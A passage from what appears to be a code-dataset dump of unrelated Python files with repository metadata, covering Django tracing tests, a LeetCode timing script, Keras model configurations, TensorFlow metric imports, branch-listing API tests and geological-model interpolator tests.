assert not getattr(settings, 'MIDDLEWARE_CLASSES', None) or \
'oteltrace.contrib.django.TraceMiddleware' \
not in settings.MIDDLEWARE_CLASSES
assert settings.MIDDLEWARE[-1] == 'oteltrace.contrib.django.TraceExceptionMiddleware'
assert not getattr(settings, 'MIDDLEWARE_CLASSES', None) or \
'oteltrace.contrib.django.TraceExceptionMiddleware' \
not in settings.MIDDLEWARE_CLASSES
found_mw = settings.MIDDLEWARE.count('oteltrace.contrib.django.TraceMiddleware')
assert found_mw == 1
found_mw = settings.MIDDLEWARE.count('oteltrace.contrib.django.TraceExceptionMiddleware')
assert found_mw == 1
class DjangoAutopatchCustomMiddlewareTest(DjangoTraceTestCase):
@skipIf(django.VERSION < (1, 10), 'skip if version is below 1.10')
def test_autopatching_empty_middleware(self):
with self.settings(MIDDLEWARE=[]):
patch(django=True)
django.setup()
assert django._opentelemetry_patch
assert 'oteltrace.contrib.django' in settings.INSTALLED_APPS
assert settings.MIDDLEWARE[0] == 'oteltrace.contrib.django.TraceMiddleware'
# MIDDLEWARE_CLASSES gets created internally in django 1.10 & 1.11 but doesn't
# exist at all in 2.0.
assert not getattr(settings, 'MIDDLEWARE_CLASSES', None) or \
'oteltrace.contrib.django.TraceMiddleware' \
not in settings.MIDDLEWARE_CLASSES
assert settings.MIDDLEWARE[-1] == 'oteltrace.contrib.django.TraceExceptionMiddleware'
assert not getattr(settings, 'MIDDLEWARE_CLASSES', None) or \
'oteltrace.contrib.django.TraceExceptionMiddleware' \
not in settings.MIDDLEWARE_CLASSES
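# Illustrative summary (sketch, not part of the test module): after patch(django=True)
# followed by django.setup(), the assertions above expect settings of roughly this shape
# on Django >= 1.10:
#   settings.INSTALLED_APPS -> [..., 'oteltrace.contrib.django']
#   settings.MIDDLEWARE     -> ['oteltrace.contrib.django.TraceMiddleware', ...,
#                               'oteltrace.contrib.django.TraceExceptionMiddleware']
# and on Django < 1.10 the same ordering applies to settings.MIDDLEWARE_CLASSES instead.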
| [line-length statistics and quality-signal metric columns for the preceding file] |
b78cde6d3cebe29f7e931577e725ff4b7c24b1cf | 54 | py | Python | app/src/main/python/myscript.py | dhivakar31/chaquopy3107 | dc0748d3f3df1e1125788175a4a00c57eab85526 | ["MIT"] | null | null | null |
app/src/main/python/myscript.py | dhivakar31/chaquopy3107 | dc0748d3f3df1e1125788175a4a00c57eab85526 | ["MIT"] | null | null | null |
app/src/main/python/myscript.py | dhivakar31/chaquopy3107 | dc0748d3f3df1e1125788175a4a00c57eab85526 | ["MIT"] | null | null | null |
def add(a,b):
return a+b
def sub(a,b):
return a-b
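# Minimal usage sketch (assumption: this module is normally invoked from the Android
# side via Chaquopy; the standalone calls below are only illustrative):
if __name__ == "__main__":
    print(add(2, 3))  # -> 5
    print(sub(5, 2))  # -> 3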
| [line-length statistics and quality-signal metric columns for the preceding file] |
b79db24da371797a985afbe7993ff2334ee38df9 | 271 | py | Python | sources/controller/__init__.py | Groomsha/lan-map | 1c30819470f43f8521e98eb75c70da23939f8f06 | ["Apache-2.0"] | null | null | null |
sources/controller/__init__.py | Groomsha/lan-map | 1c30819470f43f8521e98eb75c70da23939f8f06 | ["Apache-2.0"] | null | null | null |
sources/controller/__init__.py | Groomsha/lan-map | 1c30819470f43f8521e98eb75c70da23939f8f06 | ["Apache-2.0"] | null | null | null |
from .main_window.main_window_controller import *
from .new_device_window.new_device_controller import *
from .new_device_window.save_data_new_device import *
from .new_device_window.button_new_device import *
from .new_device_window.widgets_control_new_device import *
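# Illustrative note (assumption about intent): the wildcard imports above re-export the
# window-controller helpers at the package root, so client code can write, e.g.
#   from sources.controller import *
# instead of importing each main-window / new-device submodule path individually.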
| [line-length statistics and quality-signal metric columns for the preceding file] |
b7d07c5e4feef14cc5c5422522e05040db50289a | 2,406 | py | Python | AATCC/lab-report/w2/lc-7-test.py | kancheng/kan-cs-report-in-2022 | 2a1e1eaa515349d59803c7831a7bd4cbea890a44 | ["MIT"] | null | null | null |
AATCC/lab-report/w2/lc-7-test.py | kancheng/kan-cs-report-in-2022 | 2a1e1eaa515349d59803c7831a7bd4cbea890a44 | ["MIT"] | null | null | null |
AATCC/lab-report/w2/lc-7-test.py | kancheng/kan-cs-report-in-2022 | 2a1e1eaa515349d59803c7831a7bd4cbea890a44 | ["MIT"] | null | null | null |
import time
# Measure the running efficiency of EX 1
start = time.process_time()
class Solution1:
def reverse(self, x: int) -> int:
max_32 = 2 ** 31 - 1
if abs(x) > max_32:
return 0
if x < 0:
rint = -int(str(abs(x))[::-1])
else:
rint = int(str(x)[::-1])
if abs(rint) > max_32:
return 0
else:
return rint
x1 = -123
x2 = 123
x3 = 120
ob1 = Solution1()
print(ob1.reverse(x1))
print(ob1.reverse(x2))
print(ob1.reverse(x3))
end = time.process_time()
print("Process Time: time of EX 1 is %.5f" % float(end-start))
start = time.perf_counter()
class Solution1:
def reverse(self, x: int) -> int:
max_32 = 2 ** 31 - 1
if abs(x) > max_32:
return 0
if x < 0:
rint = -int(str(abs(x))[::-1])
else:
rint = int(str(x)[::-1])
if abs(rint) > max_32:
return 0
else:
return rint
x1 = -123
x2 = 123
x3 = 120
ob1 = Solution1()
print(ob1.reverse(x1))
print(ob1.reverse(x2))
print(ob1.reverse(x3))
end = time.perf_counter()
print("Perf Counter: time of EX 1 is %.5f" % float(end-start))
# Measure the running efficiency of EX 2
start = time.process_time()
class Solution2:
def reverse(self, x):
"""
:type x: int
:rtype: int
"""
if x==0:
return 0
str_x = str(x)
x = ''
if str_x[0] == '-':
x += '-'
x += str_x[len(str_x)-1::-1].lstrip("0").rstrip("-")
x = int(x)
if -2**31<x<2**31-1:
return x
return 0
x1 = -123
x2 = 123
x3 = 120
ob2 = Solution2()
print(ob2.reverse(x1))
print(ob2.reverse(x2))
print(ob2.reverse(x3))
end = time.process_time()
print("Process Time: time of EX 2 is %.5f" % float(end-start))
start = time.perf_counter()
class Solution2:
def reverse(self, x):
"""
:type x: int
:rtype: int
"""
if x==0:
return 0
str_x = str(x)
x = ''
if str_x[0] == '-':
x += '-'
x += str_x[len(str_x)-1::-1].lstrip("0").rstrip("-")
x = int(x)
if -2**31<x<2**31-1:
return x
return 0
x1 = -123
x2 = 123
x3 = 120
ob2 = Solution2()
print(ob2.reverse(x1))
print(ob2.reverse(x2))
print(ob2.reverse(x3))
end = time.perf_counter()
print("Perf Counter: time of EX 2 is %.5f" % float(end-start))
| [line-length statistics and quality-signal metric columns for the preceding file] |
4d69ba1aa8e32ef8eb741e0c316674aff19ad67f | 13,020 | py | Python | Code/model_selection.py | MartinSchiemer/Revisiting_the_Information_Plane | 0376d4a30d3753698f5985d657c92c3395def3ac | ["MIT"] | 1 | 2021-07-19T02:07:01.000Z | 2021-07-19T02:07:01.000Z |
Code/model_selection.py | MartinSchiemer/Revisiting_the_Information_Plane | 0376d4a30d3753698f5985d657c92c3395def3ac | ["MIT"] | null | null | null |
Code/model_selection.py | MartinSchiemer/Revisiting_the_Information_Plane | 0376d4a30d3753698f5985d657c92c3395def3ac | ["MIT"] | null | null | null |
"""
Author: Martin Schiemer
some sample model configurations
"""
import numpy as np
np.random.seed(1337)
# tensorflow properties
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Input, InputLayer, Dense, Activation, LeakyReLU, Flatten, Conv2D, MaxPooling2D
from tensorflow.keras.utils import normalize
from tensorflow.keras import optimizers
from tensorflow.keras.models import Model
def select_model(index, nr_of_epochs, set_name, x_train_shape, y_train):
"""
creates a model and a network name according to the dataset
index: flag that decides which model is used
nr_of_epochs: maximum number of epochs
set_name: name of the dataset
x_train_shape: shape of the input data
y_train: the output labels (used to derive the output shape and class count)
returns: model and architecture name
"""
x_shape_length = len(x_train_shape)
if len(y_train.shape) > 1:
y_shape_length = y_train.shape[1]
else:
y_shape_length = 1
amount_of_classes = len(np.unique(y_train))
print("amount of classes", amount_of_classes)
print("Input shape: ", x_train_shape, " length: ", x_shape_length)
# define model
# mix network with leading TanH
if index == 1:
architecture = set_name + str(nr_of_epochs) + "D10T_D7T_D5R_D4R_D3R_D1S"
model = Sequential()
# input layers are needed to allow backend calculations
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Dense(10))
model.add(Activation("tanh"))
model.add(Dense(7))
model.add(Activation("tanh"))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Dense(4))
model.add(Activation("relu"))
model.add(Dense(3))
model.add(Activation("relu"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# mix network with leading ReLU
if index == 2:
architecture = set_name + str(nr_of_epochs) + "D10R_D7R_D5T_D4T_D3T_D1S"
model = Sequential()
#model.add(InputLayer((x_train_shape,)))
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Flatten())
model.add(Dense(10))
model.add(Activation("relu"))
model.add(Dense(7))
model.add(Activation("relu"))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Dense(4))
model.add(Activation("tanh"))
model.add(Dense(3))
model.add(Activation("tanh"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# ReLU network
if index == 3:
architecture = set_name + str(nr_of_epochs) + "D10R_D7R_D5R_D4R_D3R_D1S"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Dense(10))
model.add(Activation("relu"))
model.add(Dense(7))
model.add(Activation("relu"))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Dense(4))
model.add(Activation("relu"))
model.add(Dense(3))
model.add(Activation("relu"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# TanH network
if index == 4:
architecture = set_name + str(nr_of_epochs) + "D10T_D7T_D5T_D4T_D3T_D1S"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Flatten())
model.add(Dense(10))
model.add(Activation("tanh"))
model.add(Dense(7))
model.add(Activation("tanh"))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Dense(4))
model.add(Activation("tanh"))
model.add(Dense(3))
model.add(Activation("tanh"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# convolutional network with ReLU
if index == 5:
architecture = set_name + str(nr_of_epochs) + "COV32R_COV64R_D10R_D5R_D" + str(amount_of_classes) + "Soft"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1])))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1],
x_train_shape[2], x_train_shape[3])))
model.add(Conv2D(16, kernel_size=(3,3), strides=(1,1),input_shape=(x_train_shape[0],
x_train_shape[1],
x_train_shape[2])))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Conv2D(32, kernel_size=(5, 5), strides=(1,1)))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(7))
model.add(Activation("relu"))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# convolutional network with TanH
if index == 6:
architecture = set_name + str(nr_of_epochs) + "COV32T_COV64T_D10T_D5T_D" + str(amount_of_classes) +"Soft"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1])))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1],
x_train_shape[2], x_train_shape[3])))
model.add(Conv2D(16, kernel_size=(3,3), strides=(1,1),
input_shape=(x_train_shape[0],x_train_shape[1],x_train_shape[2])))
model.add(Activation("tanh"))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Conv2D(32, kernel_size=(5, 5), strides=(1,1)))
model.add(Activation("tanh"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(7))
model.add(Activation("tanh"))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# Same layer size network ReLU
if index == 7:
architecture = set_name + str(nr_of_epochs) + "D5R_D5R_D5R_D5R_D5R_D1S"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Dense(5))
model.add(Activation("relu"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# Same layer size network TanH
if index == 8:
architecture = set_name + str(nr_of_epochs) + "D5T_D5T_D5T_D5T_D5T_D1S"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Dense(5))
model.add(Activation("tanh"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# bottleneck network with TanH
if index == 9:
architecture = set_name + str(nr_of_epochs) + "D12T_D3T_D2T_D12T_D2T_D1S"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Dense(12))
model.add(Activation("tanh"))
model.add(Dense(3))
model.add(Activation("tanh"))
model.add(Dense(2))
model.add(Activation("tanh"))
model.add(Dense(12))
model.add(Activation("tanh"))
model.add(Dense(2))
model.add(Activation("tanh"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# bottleneck network with ReLU
if index == 10:
architecture = set_name + str(nr_of_epochs) + "D12R_D3R_D2R_D12R_D2R_D1S"
model = Sequential()
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Dense(12))
model.add(Activation("relu"))
model.add(Dense(3))
model.add(Activation("relu"))
model.add(Dense(2))
model.add(Activation("relu"))
model.add(Dense(12))
model.add(Activation("relu"))
model.add(Dense(2))
model.add(Activation("relu"))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
# leaky ReLU network
if index == 11:
architecture = set_name + str(nr_of_epochs) + "D10LR_D7LR_D5LR_D4LR_D3LR_D1S"
model = Sequential()
#model.add(InputLayer((x_train_shape,)))
if x_shape_length == 2 :
model.add(InputLayer((x_train_shape[1],)))
elif x_shape_length == 3 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2])))
elif x_shape_length == 4 :
model.add(InputLayer((x_train_shape[1], x_train_shape[2],
x_train_shape[3])))
model.add(Flatten())
model.add(Dense(10))
model.add(LeakyReLU(alpha=0.1))
model.add(Dense(7))
model.add(LeakyReLU(alpha=0.1))
model.add(Dense(5))
model.add(LeakyReLU(alpha=0.1))
model.add(Dense(4))
model.add(LeakyReLU(alpha=0.1))
model.add(Dense(3))
model.add(LeakyReLU(alpha=0.1))
model.add(Flatten())
model.add(Dense(y_shape_length))
model.add(Activation("softmax"))
return model, architecture
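A brief usage sketch for select_model (not part of the original module); the toy shapes and the set name "toy" are hypothetical, and TensorFlow/Keras must be available as imported above:
import numpy as np

# 100 flat samples with 12 features, 3 one-hot classes (hypothetical data).
x_train = np.random.rand(100, 12)
y_train = np.eye(3)[np.random.randint(0, 3, size=100)]

model, architecture = select_model(index=3,
                                   nr_of_epochs=50,
                                   set_name="toy",
                                   x_train_shape=x_train.shape,
                                   y_train=y_train)
print(architecture)  # e.g. "toy50D10R_D7R_D5R_D4R_D3R_D1S"
model.summary()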
| 32.962025
| 114
| 0.572197
| 1,663
| 13,020
| 4.258569
| 0.086591
| 0.206721
| 0.121152
| 0.0939
| 0.837758
| 0.819825
| 0.811635
| 0.780006
| 0.776617
| 0.734821
| 0
| 0.034411
| 0.2947
| 13,020
| 395
| 115
| 32.962025
| 0.736796
| 0.061137
| 0
| 0.835714
| 0
| 0
| 0.048097
| 0.022116
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003571
| false
| 0
| 0.028571
| 0
| 0.035714
| 0.007143
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4d7df921ec137def1ddd43689a42e20db0ff3bf9
| 2,153
|
py
|
Python
|
Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/metrics/__init__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 3
|
2019-04-01T11:03:04.000Z
|
2019-12-31T02:17:15.000Z
|
Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/metrics/__init__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 1
|
2021-04-15T18:46:45.000Z
|
2021-04-15T18:46:45.000Z
|
Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/metrics/__init__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 1
|
2021-09-23T13:43:07.000Z
|
2021-09-23T13:43:07.000Z
|
"""Imports for Python API.
This file is MACHINE GENERATED! Do not edit.
Generated by: tensorflow/tools/api/generator/create_python_api.py script.
"""
from tensorflow.python.ops.metrics import accuracy
from tensorflow.python.ops.metrics import auc
from tensorflow.python.ops.metrics import average_precision_at_k
from tensorflow.python.ops.metrics import false_negatives
from tensorflow.python.ops.metrics import false_negatives_at_thresholds
from tensorflow.python.ops.metrics import false_positives
from tensorflow.python.ops.metrics import false_positives_at_thresholds
from tensorflow.python.ops.metrics import mean
from tensorflow.python.ops.metrics import mean_absolute_error
from tensorflow.python.ops.metrics import mean_cosine_distance
from tensorflow.python.ops.metrics import mean_iou
from tensorflow.python.ops.metrics import mean_per_class_accuracy
from tensorflow.python.ops.metrics import mean_relative_error
from tensorflow.python.ops.metrics import mean_squared_error
from tensorflow.python.ops.metrics import mean_tensor
from tensorflow.python.ops.metrics import percentage_below
from tensorflow.python.ops.metrics import precision
from tensorflow.python.ops.metrics import precision_at_k
from tensorflow.python.ops.metrics import precision_at_thresholds
from tensorflow.python.ops.metrics import precision_at_top_k
from tensorflow.python.ops.metrics import recall
from tensorflow.python.ops.metrics import recall_at_k
from tensorflow.python.ops.metrics import recall_at_thresholds
from tensorflow.python.ops.metrics import recall_at_top_k
from tensorflow.python.ops.metrics import root_mean_squared_error
from tensorflow.python.ops.metrics import sensitivity_at_specificity
from tensorflow.python.ops.metrics import sparse_average_precision_at_k
from tensorflow.python.ops.metrics import sparse_precision_at_k
from tensorflow.python.ops.metrics import specificity_at_sensitivity
from tensorflow.python.ops.metrics import true_negatives
from tensorflow.python.ops.metrics import true_negatives_at_thresholds
from tensorflow.python.ops.metrics import true_positives
from tensorflow.python.ops.metrics import true_positives_at_thresholds
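A minimal sketch (not part of the generated file) of how one of these re-exported symbols is typically used under the TensorFlow 1.x graph API, assuming a TF 1.x runtime:
import tensorflow as tf

labels = tf.constant([1, 0, 1, 1])
predictions = tf.constant([1, 1, 1, 0])
# tf.metrics.accuracy returns (value_tensor, update_op) backed by local variables.
acc, acc_update = tf.metrics.accuracy(labels, predictions)
with tf.Session() as sess:
    sess.run(tf.local_variables_initializer())
    sess.run(acc_update)
    print(sess.run(acc))  # 0.5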
| 56.657895
| 73
| 0.87738
| 315
| 2,153
| 5.796825
| 0.168254
| 0.253012
| 0.361446
| 0.415663
| 0.866375
| 0.866375
| 0.807229
| 0.638007
| 0.278204
| 0.060241
| 0
| 0
| 0.069206
| 2,153
| 38
| 74
| 56.657895
| 0.911178
| 0.066419
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
4d80a70f3e54efcb2f91c7944b437bf6ede5f182
| 4,230
|
py
|
Python
|
tests/changes/api/test_repository_tree_index.py
|
vault-the/changes
|
37e23c3141b75e4785cf398d015e3dbca41bdd56
|
[
"Apache-2.0"
] | 443
|
2015-01-03T16:28:39.000Z
|
2021-04-26T16:39:46.000Z
|
tests/changes/api/test_repository_tree_index.py
|
vault-the/changes
|
37e23c3141b75e4785cf398d015e3dbca41bdd56
|
[
"Apache-2.0"
] | 12
|
2015-07-30T19:07:16.000Z
|
2016-11-07T23:11:21.000Z
|
tests/changes/api/test_repository_tree_index.py
|
vault-the/changes
|
37e23c3141b75e4785cf398d015e3dbca41bdd56
|
[
"Apache-2.0"
] | 47
|
2015-01-09T10:04:00.000Z
|
2020-11-18T17:58:19.000Z
|
import urllib
from mock import patch
from changes.models.repository import RepositoryBackend
from changes.testutils import APITestCase
class RepositoryTreeListTest(APITestCase):
def test_no_vcs(self):
repo = self.create_repo(url='https://example.co.nonexistent/bar')
path = '/api/0/repositories/{0}/branches/'.format(repo.id)
resp = self.client.get(path)
self.assertEquals(resp.status_code, 422, resp.data)
self.assertIn('backend', resp.data)
@patch('changes.vcs.git.GitVcs.get_known_branches')
def test_get_single_branch(self, known_branches_mock):
test_branch_name = 'some_branch_name'
known_branches_mock.return_value = [test_branch_name]
repo = self.create_repo(url='https://example.co.nonexistent/bar',
backend=RepositoryBackend.git)
path = '/api/0/repositories/{0}/branches/'.format(repo.id)
resp = self.client.get(path)
self.assertEquals(resp.status_code, 200, resp.data)
data = self.unserialize(resp)
assert len(data) == 1
assert data[0]['name'] == test_branch_name
@patch('changes.vcs.git.GitVcs.get_known_branches')
def test_get_multiple_branches(self, known_branches_mock):
test_branches = ['first_branch', '2nd:Branch']
known_branches_mock.return_value = test_branches
repo = self.create_repo(url='https://example.co.nonexistent/bar',
backend=RepositoryBackend.git)
path = '/api/0/repositories/{0}/branches/'.format(repo.id)
resp = self.client.get(path)
self.assertEquals(resp.status_code, 200, resp.data)
data = self.unserialize(resp)
assert len(data) == 2
self.assertIn(data[0]['name'], test_branches)
self.assertIn(data[1]['name'], test_branches)
@patch('changes.vcs.git.GitVcs.get_known_branches')
def test_get_with_tree_filter(self, known_branches_mock):
test_branches = ['master', 'MATCH_ME']
known_branches_mock.return_value = test_branches
repo = self.create_repo(url='https://example.co.nonexistent/bar',
backend=RepositoryBackend.git)
path = '/api/0/repositories/{0}/branches/?branch={1}'.format(
repo.id, 'match')
resp = self.client.get(path)
self.assertEquals(resp.status_code, 200, resp.data)
data = self.unserialize(resp)
assert len(data) == 1
self.assertIn(data[0]['name'], 'MATCH_ME')
@patch('changes.vcs.git.GitVcs.get_known_branches')
def test_get_with_escaped_tree_filter(self, known_branches_mock):
test_branches = ['master', 'MATCH:/ME']
known_branches_mock.return_value = test_branches
repo = self.create_repo(url='https://example.co.nonexistent/bar',
backend=RepositoryBackend.git)
path = '/api/0/repositories/{0}/branches/?branch={1}'.format(
repo.id, urllib.quote('match:/', safe=''))
resp = self.client.get(path)
self.assertEquals(resp.status_code, 200, resp.data)
data = self.unserialize(resp)
assert len(data) == 1
self.assertIn(data[0]['name'], 'MATCH:/ME')
@patch('changes.vcs.git.GitVcs.get_known_branches')
def test_get_with_caching(self, known_branches_mock):
test_branches = ['first_branch', '2nd:Branch']
known_branches_mock.return_value = test_branches
repo = self.create_repo(url='https://example.co.nonexistent/bar',
backend=RepositoryBackend.git)
path = '/api/0/repositories/{0}/branches/'.format(repo.id)
# Get first time to warm up cache
resp = self.client.get(path)
self.assertEquals(resp.status_code, 200, resp.data)
data = self.unserialize(resp)
print(data)
assert len(data) == 2
# Get again to fetch from cache
resp = self.client.get(path)
self.assertEquals(resp.status_code, 200, resp.data)
data = self.unserialize(resp)
print(data)
assert len(data) == 2
self.assertIn(data[0]['name'], test_branches)
self.assertIn(data[1]['name'], test_branches)
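A short illustration (not part of the test file) of the URL escaping that test_get_with_escaped_tree_filter relies on; urllib.quote is the Python 2 spelling (urllib.parse.quote in Python 3), and 'repo-id' is a placeholder:
import urllib

print(urllib.quote('match:/', safe=''))  # -> match%3A%2F
path = '/api/0/repositories/{0}/branches/?branch={1}'.format(
    'repo-id', urllib.quote('match:/', safe=''))
print(path)  # -> /api/0/repositories/repo-id/branches/?branch=match%3A%2F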
| 41.881188
| 73
| 0.642553
| 525
| 4,230
| 5.001905
| 0.150476
| 0.074257
| 0.064737
| 0.045316
| 0.855674
| 0.846154
| 0.833968
| 0.833968
| 0.833968
| 0.833968
| 0
| 0.0153
| 0.227423
| 4,230
| 100
| 74
| 42.3
| 0.78825
| 0.014421
| 0
| 0.716049
| 0
| 0
| 0.18771
| 0.102016
| 0
| 0
| 0
| 0
| 0.259259
| 1
| 0.074074
| false
| 0
| 0.049383
| 0
| 0.135802
| 0.024691
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4d8895ed0b2967ed5e2a2b88a94af9e04dc3472d
| 3,341
|
py
|
Python
|
tests/integration/test_interpolator.py
|
vpicavet/LoopStructural
|
cde34fabc53b4d5cb0f8e22f53a574fac44dfbd6
|
[
"MIT"
] | 67
|
2020-06-25T06:50:58.000Z
|
2022-03-29T17:15:43.000Z
|
tests/integration/test_interpolator.py
|
vpicavet/LoopStructural
|
cde34fabc53b4d5cb0f8e22f53a574fac44dfbd6
|
[
"MIT"
] | 60
|
2020-06-28T22:58:21.000Z
|
2022-03-24T01:30:59.000Z
|
tests/integration/test_interpolator.py
|
vpicavet/LoopStructural
|
cde34fabc53b4d5cb0f8e22f53a574fac44dfbd6
|
[
"MIT"
] | 9
|
2020-06-25T13:07:39.000Z
|
2021-12-01T01:41:24.000Z
|
from LoopStructural import GeologicalModel
from LoopStructural.datasets import load_claudius
def test_create_model():
data, bb = load_claudius()
model = GeologicalModel(bb[0,:],bb[1,:])
def test_add_data():
data, bb = load_claudius()
model = GeologicalModel(bb[0,:],bb[1,:])
model.set_model_data(data)
def test_create_stratigraphy_FDI_cg():
data, bb = load_claudius()
model = GeologicalModel(bb[0, :], bb[1, :])
model.set_model_data(data)
s0 = model.create_and_add_foliation('s0',
interpolatortype='FDI',
nelements=1000,
solver='cg',
damp=False)
def test_remove_constraints_PLI():
data, bb = load_claudius()
model = GeologicalModel(bb[0, :], bb[1, :])
model.set_model_data(data)
s0 = model.create_and_add_foliation('s0',
interpolatortype='FDI',
nelements=1000,
solver='cg',
damp=False)
def test_create_stratigraphy_FDI_lu():
data, bb = load_claudius()
model = GeologicalModel(bb[0, :], bb[1, :])
model.set_model_data(data)
s0 = model.create_and_add_foliation('s0',
interpolatortype='FDI',
nelements=1000,
solver='lu',
damp=True)
def test_create_stratigraphy_FDI_pyamg():
data, bb = load_claudius()
model = GeologicalModel(bb[0, :], bb[1, :])
model.set_model_data(data)
s0 = model.create_and_add_foliation('s0',
interpolatortype='FDI',
nelements=1000,
solver='pyamg',
damp=True)
def test_create_stratigraphy_PLI_cg():
data, bb = load_claudius()
model = GeologicalModel(bb[0, :], bb[1, :])
model.set_model_data(data)
s0 = model.create_and_add_foliation('s0',
interpolatortype='PLI',
nelements=1000,
solver='cg',
damp=False)
def test_create_stratigraphy_PLI_lu():
data, bb = load_claudius()
model = GeologicalModel(bb[0, :], bb[1, :])
model.set_model_data(data)
s0 = model.create_and_add_foliation('s0',
interpolatortype='PLI',
